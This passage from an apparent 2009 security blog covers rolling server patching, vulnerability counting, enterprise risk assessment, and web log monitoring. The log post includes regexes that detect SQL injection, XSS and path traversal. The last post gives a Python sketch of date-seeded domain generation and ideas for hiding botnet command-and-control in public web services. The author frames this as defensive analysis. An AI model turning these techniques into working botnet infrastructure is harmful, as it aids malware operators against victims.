
  1. Move the virtualized hosts from one server to the others

  2. Patch the now-idle server

  3. Check if it comes back properly

  4. Gradually put the load back on that server and check for any impact from the patch

  5. If everything is ok, go back to step #1 for the next server - repeat until all servers are patched
I wonder if the guys from Microsoft Update are talking with the Azure team - a big challenge for team integration ahead, and a business opportunity for patch management companies.
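Just to picture the loop, here is a minimal sketch of those five steps. The evacuate, apply_patches, health_check and rebalance calls are placeholders for whatever the hypervisor or cloud management layer actually exposes; the point is the orchestration, not the API.

def rolling_patch(hosts, evacuate, apply_patches, health_check, rebalance):
    """Patch a pool of hosts one at a time without taking the service down."""
    for host in hosts:
        evacuate(host)              # 1. live-migrate the VMs off this host
        apply_patches(host)         # 2. patch the now-idle host
        if not health_check(host):  # 3. check that it comes back properly
            raise RuntimeError(f"{host} failed post-patch checks, stopping rollout")
        rebalance(host)             # 4. gradually put load back and watch for impact
        # 5. the loop then moves on to the next host until all are patched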

Tuesday, March 17, 2009

Cognitive Dissonance? I must disagree

I like the spin that Pete Lindstrom gives to some classic security discussions, but I think he is completely missing the point here:

"If finding vulnerabilities makes software more secure, why do we assert that software with the highest vulnerability count is less secure (than, e.g., a competitor)?"

If we agree with him, we could also say that cities where more criminals are caught and sent to jail are more secure than those that catch fewer criminals. I could then argue that, in order to become more secure, a city should stop putting criminals in jail.

There are two separate problems. One is to avoid creating new criminals (or to avoid adding vulnerabilities to code). The other is to deal with those that are already there (finding bugs). Dealing with the first problem is the best approach, as you will spend less on the second, but you cannot just let the current criminals keep "working" until they "retire".

With crime, we can know how effective the measures to prevent the creation of new criminals are without necessarily working to put the current ones in jail; you just need to keep numbers on crime occurrences. But with vulnerabilities, we need to discover them in order to know whether the developer is doing a good job of avoiding them. We can accept that an unknown vulnerability carries no risk, but I don't think it's a good idea to wait until people with malicious intent start finding holes in the software I use to learn whether that developer is good at writing secure code. At that point, it's too late.

Thursday, March 12, 2009

Attack Vector Risk Management

I read this post from Michael Dahn and I really liked what he called "Attack Vector Risk Management". Today I saw that the guys from SensePost also noted the post for the same reasons, and even showed some of their work on the same concept, which they call "Corporate Threat Modeling".

Over the last few months my main interest has been enterprise security planning. How should an organization define how to spend its security resources, what should be done, and in what order? Risk management is usually the answer (please DON'T SAY COMPLIANCE!), but IMHO the risk assessment methodologies out there just don't scale to the point where they can be used to drive security decisions at the enterprise level. You end up using so many "educated guesses" that the end result is just not intellectually honest; everything is so biased towards what people already believe their major risks to be that a simple brainstorm would probably generate the same results. Have you ever seen the results of an enterprise-level RA surprise anyone (except for dumb-as-hell CISOs)? I haven't.

I don't think the SensePost approach scales well either, but it seems better than regular RA to me. I believe we can come to something "threat oriented" that generates a better understanding of an organization's security requirements and helps the development of a security strategy. After that we will finally be able to bury the ROI/ROSI stuff and stop pretending that those beautiful tables of numbers, "high/medium/low"s or "green/yellow/red"s are anything more than our minds tricking us into believing there is a mathematical explanation behind our intuitive perception.

Until then, you can read "Blink", by Malcolm Gladwell (yes, the guy behind the current best seller, "Outliers"), to see that simply trusting our intuitive side is not that bad, although I just can't see a CISO telling an auditor that his security strategy is "intuition based" :-)


Web Application Security, what about your logs?

As usual, another very nice post from Mike Rothman, this time about application security. He mentions the BSI-MM model, which I also mentioned here in the context of measuring the outcome of security measures. Mike also mentioned, again, the need to REACT FASTER (have I said how nice his "Pragmatic CSO" stuff is?) and linked it to the application security world. As I'm working a lot with log management these days, I've noticed that I'm not seeing people talk about what to do with their web and application server logs. A lot of attacks against web applications can be identified in those logs, and yet we don't see people collecting and analyzing them. Is there anybody out there with good results on "web log" correlation? I'd like to see how evolved this is and how it can help as an early warning system for attacks against web applications.
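To give an idea of how low the entry barrier is, here is a minimal sketch of the kind of check I have in mind. The patterns and the log path are just illustrative assumptions; a real deployment would feed the matches into proper correlation instead of printing them.

import re

SUSPICIOUS = [
    re.compile(r"(?i)union\s+select"),     # SQL injection probes
    re.compile(r"(?i)<script"),            # reflected XSS attempts
    re.compile(r"\.\./\.\./"),             # path traversal
]

def suspicious_requests(logfile):
    """Yield access log lines that match any of the attack patterns."""
    with open(logfile) as fh:
        for line in fh:
            if any(p.search(line) for p in SUSPICIOUS):
                yield line.rstrip()

if __name__ == "__main__":
    for hit in suspicious_requests("/var/log/apache2/access.log"):  # assumed log location
        print(hit)

Crude, noisy, and nowhere near real correlation, but even this would surface attacks that currently go completely unread.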

Saturday, March 7, 2009

Pseudo-random algorithms used by malware

Back in 2007 I noticed (together with Fucs and Victor) that botnet creators had to solve a very important issue to keep controlling the infected computers: how do you update the location of the controller?

Until then they were including the controller location inside the bot code, so it was easy to identify it and block it or take it down. Updates could be used to point existing bots to a new controller, but new infections wouldn't be able to find the original controller to get those updates. We predicted (and we really nailed it!) that pseudo-random algorithms would be the natural choice to avoid including URLs (or other location-type info) in the malware code.

The difference between our original work and what is happening today is that most botnet authors are implementing that to generate DNS names. The problem (for them) is that this creates the need to register the names that will be generated. There are usually costs and a process to be followed to register new domain names, so I really don't think they are being very effective. We envisioned that they would use one (or some) of those new applications like P2P protocols, Skype, and general Web 2.0 stuff with search capabilities to drop information from the controller to the bots anonymously on the web and just let them search for it. We presented a proof of concept based on Skype at that time. We went far enough to say that they could even eliminate the need for a centralized command and control host by directly dropping the commands to the bots instead of the C&C location. Digital signatures would be used to reduce the risk of someone hijacking their botnet.

Since then I've seen a lot of new possibilities for implementing those concepts. Twitter, Wikipedia, Facebook: there are lots of new applications that can be used as reliable communication channels between the controller and his bots. There's no doubt that botnet creators are skilled programmers, but I think they still lack some creativity on the design side. As we said in our 2007 preso, things are not half as nasty as they could be. I can see that in a very short time we may see botnets with their C&C entirely "cloud based". Yet, we haven't evolved at all in our detection capabilities. How will we react to new threats if they get a boost on design?

We need to start thinking about how to design a next-generation, world-wide distributed monitoring solution, an "in the cloud" behaviour-anomaly intrusion detection system. Is there anybody out there working on something like this?
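To make the pseudo-random rendezvous idea concrete, here is a purely illustrative sketch (not any specific malware's algorithm) of date-seeded name generation. The same property that lets bots and their controller agree on names without hardcoded URLs also lets defenders who recover the algorithm precompute, watch or sinkhole those names.

import datetime
import hashlib

def candidate_domains(day: datetime.date, count: int = 5, tld: str = ".com"):
    """Derive a small set of deterministic candidate names for a given day."""
    domains = []
    for i in range(count):
        seed = f"{day.isoformat()}-{i}".encode()
        digest = hashlib.sha256(seed).hexdigest()
        domains.append(digest[:12] + tld)   # e.g. something like 'a1b2c3d4e5f6.com'
    return domains

# Both sides run the same code for today's date and get the same candidate list
print(candidate_domains(datetime.date(2009, 3, 7)))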